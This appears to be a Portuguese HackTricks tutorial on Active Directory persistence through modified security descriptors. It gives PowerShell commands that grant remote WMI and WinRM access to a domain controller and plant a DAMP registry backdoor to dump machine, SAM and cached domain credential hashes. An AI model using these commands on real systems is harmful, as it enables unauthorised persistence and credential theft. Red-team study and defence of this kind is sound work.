5.2 KiB
Descritores de Segurança
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.
Descritores de Segurança
A Linguagem de Definição de Descritores de Segurança (SDDL) define o formato usado para descrever um descritor de segurança. SDDL usa strings ACE para DACL e SACL:: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
Os descritores de segurança são usados para armazenar as permissões que um objeto tem sobre outro objeto. Se você conseguir fazer uma pequena alteração no descritor de segurança de um objeto, você pode obter privilégios muito interessantes sobre esse objeto sem a necessidade de ser membro de um grupo privilegiado.
Então, essa técnica de persistência é baseada na habilidade de ganhar todos os privilégios necessários contra certos objetos, para ser capaz de realizar uma tarefa que normalmente requer privilégios de administração, mas sem a necessidade de ser administrador.
Acesso ao WMI
Você pode dar a um usuário acesso para executar remotamente WMI usando isto:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Acesso ao WinRM
Conceda acesso ao console PS winrm a um usuário usando isto:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
Acesso remoto a hashes
Acesse o registro e extraia hashes criando um Reg backdoor usando DAMP, para que você possa a qualquer momento recuperar o hash do computador, o SAM e qualquer credencial do AD em cache no computador. Portanto, é muito útil conceder essa permissão a um usuário comum contra um computador Controlador de Domínio:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Verifique Silver Tickets para aprender como você pode usar o hash da conta do computador de um Controlador de Domínio.
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.